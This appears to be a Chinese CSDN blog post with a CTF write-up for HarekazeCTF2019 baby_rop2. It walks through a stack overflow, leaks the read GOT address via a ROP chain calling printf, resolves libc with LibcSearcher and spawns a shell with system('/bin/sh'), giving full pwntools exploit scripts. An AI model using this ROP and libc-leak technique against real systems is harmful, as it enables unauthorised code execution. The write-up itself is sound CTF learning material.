关于printf函数泄露地址的libc题型

已于 2023-06-09 22:24:18 修改
阅读量475 收藏 4
点赞数 2
分类专栏: libc pwn 文章标签: 网络安全
于 2023-05-25 22:08:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/IT_huanhuan/article/details/130876252
版权
pwn 同时被 2 个专栏收录
6 篇文章 0 订阅
订阅专栏
libc
1 篇文章 0 订阅
订阅专栏

题目来源:[HarekazeCTF2019]baby_rop2

拿到题目,运行一下,在检查一下它的架构和保护。

在这里插入图片描述

很明显,只有一次输入机会,并且是64位的架构,堆栈不可执行。

接下来,我们放入IDA查看一下源码。

在这里插入图片描述

可以看到很明显的栈溢出漏洞,read读入0X100字节大小的数据,但是该缓冲区只有0x28大小。所以可以在这进行栈溢出漏洞的操作。但是给我们的信息就这么多,我们找一下字符串吧

在这里插入图片描述

看来是没有/bin/sh 看来是我们自己找方法让他执行bin的调用吧。

接下来进行GDB调试吧。

在执行到read时,我们输入aaaaaaaaa,可以验证IDA里面的溢出字节是否正确,很明显IDA时正确的0x70 - 0x50 的字节,再加上8字节的覆盖到返回地址。

在这里插入图片描述

因为这道题,我们首先应该做的是泄露地址,泄露那个地址,我觉得可以是printf或者是read的地址都行,接下来我们就尝试一下吧。

我们在构建ROP链时,应该想我们需要怎样去泄露地址,才能达到我们所希望的程序执行,因为是64位的,我们需要一些 pop|ret 去放我们的参数,printf在执行打印格式化字符串时,有产生一个参数,然后我们还需要一个寄存器,来存放我们got表里所要的真实地址。

所以第一份payload用于泄露地址:

b'a'*28 + p64(pop_rdi) + p64(f_srt) + p64(pop_rsi_r15) + p64(printf_got) + p64(0) + p64(prinf_plt) + p64(main_addr)

解释一下,这里P64(0)的意思就是给R15寄存器填充对应的参数,pop_r15对应参数0,由于我们不用r15,随便设置一下它,我是设置成了0。 最后加个main函数,是我们返回到main函数,让程序走一遍,以便我们可以写入接下来的payload去控制程序流。

这下来,我们就去需要这些我们需要用到的值,由于ELF()自带可以寻找got plt symbols 所以这些我们就不用去寻找了。双击IDA,格式化字符串所在的位置,找到了他所对应的地址。

在这里插入图片描述

然后再去寻找gadget。
在这里插入图片描述

所以我们就找到,我们所用的gadget片段的地址了。

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
elf = ELF('./babyrop2')
#p = process('./babyrop2')
p = remote('node4.buuoj.cn',26128)

pop_rdi_ret = 0x0400733
pop_rsi_r15 = 0x0400731
f_str = 0x0400770
#read_got = elf.got['read']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_addr = elf.symbols['main']
payload = cyclic(0x28) + p64(pop_rdi_ret) + p64(f_str) + p64(pop_rsi_r15) + p64(printf_got) + p64(0) + p64(printf_plt) + p64(main_addr)
p.recvuntil('name?')
p.sendline(payload)

#got_addr = u64(p.recv(6).ljust(8, b'\x00')) 这里不能这样执行,因为会得到前6个字节,而这前6个字节大概率不是我们想要的地址。
printf_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))#7f是地址的开头,因为参数是逆序入栈的。所以要接受到7f之前的前6个
print(hex(printf_addr))  #当我执行这一串时,会报错,不知道为什么,泄露不了printf函数的真实地址。

泄露printf函数无望,那么我们只能去泄露read函数的真实地址了。

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
elf = ELF('./babyrop2')
#p = process('./babyrop2')
p = remote('node4.buuoj.cn',26868)

pop_rdi_ret = 0x0400733
pop_rsi_r15 = 0x0400731
f_str = 0x0400770
#ret = 0x04004d1
read_got = elf.got['read']
printf_plt = elf.plt['printf']
read_got = elf.got['read']
main_addr = elf.symbols['main']
payload = cyclic(0x28) + p64(pop_rdi_ret) + p64(f_str) + p64(pop_rsi_r15) + p64(read_got) + p64(0) + p64(printf_plt) + p64(main_addr)
#p.recvuntil('name?')
p.sendline(payload)

#read_addr = u64(p.recv(6).ljust(8, b'\x00'))
read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(read_addr))

在这里插入图片描述

得到read的真实地址,接下来,就计算libc的基地址了。

libc = LibcSearcher('read', read_addr)
base = read_addr - libc.dump('read')
sys_addr = base + libc.dump('system')
str_bin_sh = base + libc.dump('str_bin_sh')
#base = read_addr - offect_base
#sys_addr = base + offect_sys
#str_bin_sh = base + offect_str

#p.recvuntil('name?')
payload1 = cyclic(0x28) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(sys_addr)

p.sendline(payload1)
p.interactive()

1-4代码块是使用python的一个库,去计算libc。

5-7则是使用网站libc_searcher,寻偏移计算公式。(但是很不幸,这里面并没有所需的libc
在这里插入图片描述

打通了,ls一下;

在这里插入图片描述

好像并没有flag,然后`find -name “flag”

在这里插入图片描述

Y_huanhuan
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
libc.so.6 libc.so.6
05-31
libc.so.6
libft:重写一些libc函数
03-06
libft:重写一些libc函数
libc-html_node.tar.gz_GCC 函数_libc
09-21
1000页。gcc c库函数。完全版本。
Open BSD libc 源码
最新发布
02-22
OpenBSD libc 是 OpenBSD 操作系统自带的 C 标准库实现,它与其他 C 标准库有着一些显著的区别和特点,下面是一些主要的特点: 安全性优先:OpenBSD libc 重视系统安全和可靠性,将其作为设计的首要目标。libc 的开发者们致力于通过减少代码复杂性、增加安全措施和积极修补潜在的安全漏洞等方式来提高库的安全性。 简洁而稳定:OpenBSD libc 追求代码的简洁性和可读性,以便于维护和审查。它遵循“保持简单”的原则,并避免引入过多的特性和复杂性。这使得 OpenBSD libc 在设计上更加稳定,减少了潜在的错误和安全风险。 POSIX 兼容:OpenBSD libc 遵循 POSIX 标准,提供了符合 POSIX 规范的函数和接口。这使得 OpenBSD libc 可以与其他 POSIX 兼容的系统和软件进行良好的互操作性。 系统优化:OpenBSD libc 针对 OpenBSD 操作系统进行了优化。它与 OpenBSD 内核紧密配合,以提供更好的性能和效率。OpenBSD libc 专注于开发高效的系统调用和底层操作,以充分利用操作系统的功能和
libc-2.24源代码
02-06
libc-2.24源代码
泄露libc
inquisiter
01-12 1512
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数检测形如"%n"和"%12$p"这种利用方式。 考虑到main函数libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印l
printf打印函数的原理浅析
BLSpan的博客
03-16 4969
printf的底层原理浅析 前言   最近在学习linux内核的时候用到了自定义实现的printf,学习了一下,在此记录,希望有助于大家。   在C语言中,我们用到的最多的输功能函数大概就是printf了。但以前只是调用C语言的库函数,具体printf是如何实现的呢? 说到底两件事: (1)、函数变参 (2)、格式解析   下面将简要介绍以上两点内容,最后附一个简单的printf例子。 函数变参...
【Pwn】printf漏洞
weixin_52553215的博客
03-10 1079
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 629
pwn 64位 泄露libc版本
BUUCTF(pwn)[HarekazeCTF2019]baby_rop2 泄露libc基址,rop,利用gadget
半岛铁盒的博客
08-12 611
64位,开了nx保护 运行了一下程序 buf的大小是0x20,但是读入的时候读入的是0x100,造成溢,我们要想办法覆盖返回地址为” system(‘/bin/sh’) 利用read函数,去泄露程序的libc基址,然后去获得system和/bin/sh字符串的地址 然后造成溢,将返回地址覆盖为system(‘/bin/sh’) from pwn import * from LibcSearcher import * context.log_level='debug' p=remote('n
printf背后的故事
weixin_33978016的博客
01-14 195
printf背后的故事  说起编程语言,C语言大家再熟悉不过。说起最简单的代码,Helloworld更是众所周知。一条简单的printf语句便可以完成这个简单的功能,可是printf背后到底做了什么事情呢?可能很多人不曾在意,也或许你比我还要好奇!那我们就聊聊printf背后的故事。 一、printf的代码在哪里? 显然,Helloworld的源代码需要经过编译器编译,操作系统的加载才能...
Android Native层 libc 打印log信息-----bionic库打印log
qq_22613757的博客
02-28 917
前提 Android 系统把标准输stdout重定向到/dev/null中,所以logcat无法查看printf()打印的log信息。 实际操作 头文件 #include “private/libc_logging.h” 需要的函数名: __libc_format_log(ANDROID_LOG_DEBUG, tag, format, msg); 实例: # include&l...
return2libc学习笔记
omnispace的博客
03-29 4674
0x00 背景介绍 author:万抽抽 r2libc技术是一种缓冲区溢利用技术,主要用于克服常规缓冲区溢漏洞利用技术中面临的no stack executable限制(所以后续实验还是需要关闭系统的ASLR,以及堆栈保护),比如PaX和ExecShield安全策略。该技术主要是通过覆盖栈帧中保存的函数返回地址(eip),让其定位到libc库中的某个库函数(如,system等),而不是
babyrop2 疑惑及解决
m0_48127441的博客
04-07 154
简单的rop题 通过printf泄露libc地址 然后找到libc基址,从而找到one_gadget地址 实现获得shell 疑惑点是 泄露printf地址时,不输 泄露read地址数据正常
动态顺序字符串基本操作实验_Blind_pwn之格式化字符串
weixin_39993989的博客
11-07 94
作者:SkYe合天智汇可能需要提前了解的知识格式化字符串原理&利用got & plt 调用关系程序的一般启动过程原理格式化字符串盲打指的是只给可交互的 ip 地址与端口,不给对应的 binary 文件来让我们无法通过 IDA 分析,其实这个和 BROP 差不多,不过 BROP 利用的是栈溢,而这里我们利用的是无限格式化字符串漏洞,把在内存中的程序给dump下来。一般来说,我们...
printf格式化字符串漏洞
m0_64116251的博客
10-21 347
printf格式化字符串漏洞
利用printf调用malloc getshell&&0ctf2017_easiestprintf
azraelxuemo的博客
04-03 1052
文章目录0ctf2017_easiestprintf题目分析保护源码do_readleave攻击泄露libc如何劫持控制流printf源码分析小结开始利用__free_hook替换成gadget__malloc_hook换成one_gagdet最后一种解法 首先题目名字严重…漏洞看上去很简单,但真的好难 0ctf2017_easiestprintf 0ctf2017_easiestprintf 题目分析 最难的题目往往代码很简单 保护 RELRO 全开,也就是不能修改fini,init,got表来劫持控制流
今天的Linux实验
qq_52809135的博客
11-28 106
【代码】今天的Linux实验。
C语言printf函数中指针偏移
forgetjoker的博客
03-19 495
先看代码 #include <stdio.h> int main() { int arr[] = {1,2,3,4,5}; int *p = arr; for(size_t i = 0; i<5;i++) { printf("%d %d \n",p[i],*p++); } return 0; } 执行结果: 2 1 4 2 32764 3 312
如何泄露libc真实地址
05-24
通过这种方式,可以读取到存储在栈上的libc的某些函数地址,从而计算libc的基址。 对于堆溢漏洞,可以通过覆盖堆块的大小和指针来实现。通过覆盖堆块的大小,可以控制下一个堆块的起始地址,从而将指向libc的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y_huanhuan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值